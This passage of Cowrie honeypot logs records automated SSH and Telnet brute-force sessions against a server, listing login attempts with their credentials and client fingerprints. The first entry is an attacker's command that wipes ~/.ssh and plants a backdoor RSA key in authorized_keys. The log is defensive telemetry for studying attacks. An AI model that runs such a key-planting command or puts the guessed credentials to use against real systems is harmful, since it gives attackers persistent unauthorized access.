{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:01:27.380851Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:01:27.668869Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:27.669883Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37718,"dst_ip":"1.2.3.4","dst_port":22,"session":"480ae37d9870","protocol":"ssh","message":"New connection: 212.227.235.229:37718 (1.2.3.4:22) [session: 480ae37d9870]","sensor":"my-vps","timestamp":"2025-08-31T06:01:27.954196Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:01:27.955061Z","src_ip":"212.227.235.229","session":"480ae37d9870"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:01:28.241684Z","src_ip":"212.227.235.229","session":"480ae37d9870"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:29.428660Z","src_ip":"212.227.235.229","session":"480ae37d9870"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43018,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f45a3287857","protocol":"ssh","message":"New connection: 212.227.235.229:43018 (1.2.3.4:22) [session: 3f45a3287857]","sensor":"my-vps","timestamp":"2025-08-31T06:01:29.928996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:01:29.929731Z","src_ip":"212.227.235.229","session":"3f45a3287857"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:01:30.207016Z","src_ip":"212.227.235.229","session":"3f45a3287857"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:30.718093Z","src_ip":"212.227.235.229","session":"480ae37d9870"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39014,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5555d6e794a","protocol":"ssh","message":"New connection: 212.227.235.229:39014 (1.2.3.4:22) [session: f5555d6e794a]","sensor":"my-vps","timestamp":"2025-08-31T06:01:31.005708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:01:31.006802Z","src_ip":"212.227.235.229","session":"f5555d6e794a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:01:31.294636Z","src_ip":"212.227.235.229","session":"f5555d6e794a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@2025","message":"login attempt [ubuntu/Admin@2025] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:31.356096Z","src_ip":"212.227.235.229","session":"3f45a3287857"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:01:32.485909Z","src_ip":"212.227.235.229","session":"f5555d6e794a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:32.635008Z","src_ip":"212.227.235.229","session":"3f45a3287857"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:32.775231Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:32.776086Z","src_ip":"212.227.235.229","session":"f5555d6e794a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55350,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f6994158fd2","protocol":"ssh","message":"New connection: 212.227.125.160:55350 (1.2.3.4:22) [session: 8f6994158fd2]","sensor":"my-vps","timestamp":"2025-08-31T06:01:33.640256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:01:34.184989Z","src_ip":"212.227.125.160","session":"8f6994158fd2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:01:34.185727Z","src_ip":"212.227.125.160","session":"8f6994158fd2"}
{"eventid":"cowrie.login.failed","username":"test3","password":"password1","message":"login attempt [test3/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:35.941628Z","src_ip":"212.227.125.160","session":"8f6994158fd2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:37.344079Z","src_ip":"212.227.125.160","session":"8f6994158fd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53076,"dst_ip":"1.2.3.4","dst_port":22,"session":"c89972db79ec","protocol":"ssh","message":"New connection: 212.227.235.229:53076 (1.2.3.4:22) [session: c89972db79ec]","sensor":"my-vps","timestamp":"2025-08-31T06:01:40.682642Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":45186,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e73b1e23dc0","protocol":"ssh","message":"New connection: 43.159.36.188:45186 (1.2.3.4:22) [session: 2e73b1e23dc0]","sensor":"my-vps","timestamp":"2025-08-31T06:01:42.721958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:01:42.722630Z","src_ip":"43.159.36.188","session":"2e73b1e23dc0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:01:42.971377Z","src_ip":"43.159.36.188","session":"2e73b1e23dc0"}
{"eventid":"cowrie.login.failed","username":"aaa","password":"12345678","message":"login attempt [aaa/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:44.008629Z","src_ip":"43.159.36.188","session":"2e73b1e23dc0"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:45.259676Z","src_ip":"43.159.36.188","session":"2e73b1e23dc0"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:50.566997Z","src_ip":"212.227.125.160","session":"08026bf45dae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45998,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f2afef5c9d2","protocol":"ssh","message":"New connection: 212.227.125.160:45998 (1.2.3.4:22) [session: 2f2afef5c9d2]","sensor":"my-vps","timestamp":"2025-08-31T06:01:50.708432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:01:50.847951Z","src_ip":"212.227.235.229","session":"c89972db79ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:01:50.849062Z","src_ip":"212.227.235.229","session":"c89972db79ec"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:01:51.768520Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:01:51.769899Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.148.193","src_port":34456,"dst_ip":"1.2.3.4","dst_port":23,"session":"b4e3a4cf1804","protocol":"telnet","message":"New connection: 176.65.148.193:34456 (1.2.3.4:23) [session: b4e3a4cf1804]","sensor":"my-vps","timestamp":"2025-08-31T06:01:54.508921Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:01:54.549360Z","src_ip":"176.65.148.193","session":"b4e3a4cf1804"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:01:54.566639Z","src_ip":"176.65.148.193","session":"b4e3a4cf1804"}
{"eventid":"cowrie.session.closed","duration":"38.2","message":"Connection lost after 38.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:55.774224Z","src_ip":"212.227.125.160","session":"08026bf45dae"}
{"eventid":"cowrie.login.success","username":"root","password":"fckgw0508","message":"login attempt [root/fckgw0508] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:01:57.841188Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:01.060739Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T06:02:01.061717Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:02.342301Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.session.closed","duration":"11.6","message":"Connection lost after 11.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:02.343485Z","src_ip":"212.227.125.160","session":"2f2afef5c9d2"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":33686,"dst_ip":"1.2.3.4","dst_port":22,"session":"79b519aea37f","protocol":"ssh","message":"New connection: 201.148.180.50:33686 (1.2.3.4:22) [session: 79b519aea37f]","sensor":"my-vps","timestamp":"2025-08-31T06:02:11.604071Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43172,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a958f521cc","protocol":"ssh","message":"New connection: 212.227.235.229:43172 (1.2.3.4:22) [session: 73a958f521cc]","sensor":"my-vps","timestamp":"2025-08-31T06:02:11.904370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:02:12.250832Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:02:12.252612Z","src_ip":"201.148.180.50","session":"79b519aea37f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:02:12.671737Z","src_ip":"212.227.235.229","session":"73a958f521cc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","a